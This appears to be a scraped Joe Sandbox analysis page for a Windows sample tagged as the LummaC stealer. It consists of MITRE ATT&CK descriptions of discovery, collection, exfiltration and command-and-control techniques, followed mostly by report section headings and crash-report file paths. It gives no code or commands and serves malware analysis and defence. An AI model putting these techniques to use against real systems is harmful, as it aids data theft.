Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OtHVIQ2ge4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_OtHVIQ2ge4.exe_5dacb62bd6a6a5eb7fe2529a9545383a937b_5a9d21f3_b1cf8786-64a9-40b3-94f7-a647c6153908\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER783.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D2.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Windows Analysis Report
OtHVIQ2ge4.exe